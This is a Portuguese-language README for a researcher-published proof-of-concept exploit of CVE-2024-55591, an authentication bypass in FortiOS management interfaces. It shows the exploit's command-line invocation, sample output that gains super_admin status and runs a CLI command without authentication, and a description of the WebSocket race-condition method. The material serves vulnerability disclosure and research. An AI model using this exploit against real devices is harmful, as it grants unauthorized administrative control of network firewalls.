
Prova de conceito de exploit para CVE-2024-55591, demonstrando bypass de autenticação nas interfaces de gerenciamento do FortiOS por meio de condição de corrida em WebSocket para executar comandos CLI sem autenticação.
Uma prova de conceito de bypass de autenticação do Fortinet FortiOS
Consulte nossa publicação no blog para detalhes técnicos
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \\| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \\___| Y | |( <_> \ / | | \
\/\_/ (____ |__| \\\\___ |___|__|__ | \\__ / \\/\_/ |__|
\\ \\ \\
CVE-2024-55591.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2024-55591]
[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337
Output from server: �
get system status
Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0
FAKESERIAL #
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)
Este script é uma prova de conceito para CVE-2024-55591, voltado para interfaces de gerenciamento do FortiOS (Fortigate). Ao criar força bruta de conexões WebSocket para gerar uma condição de corrida juntamente com um bypass de autenticação, é possível enviar comandos CLI do FortiOS sem autenticação. Mais detalhes são descritos em nosso [post no blog] (https://labs.watchtowr.com/).
Mais detalhes no aviso da Fortinet
Este script não foi projetado para funcionar com FortiProxy, pois as verificações preliminares determinam se a instância é uma Interface de Gerenciamento FortiGate, mas presume-se que a técnica subjacente seja aplicável aos dispositivos FortiProxy afetados.
Para as pesquisas de segurança mais recentes, siga a equipe watchTowr Labs.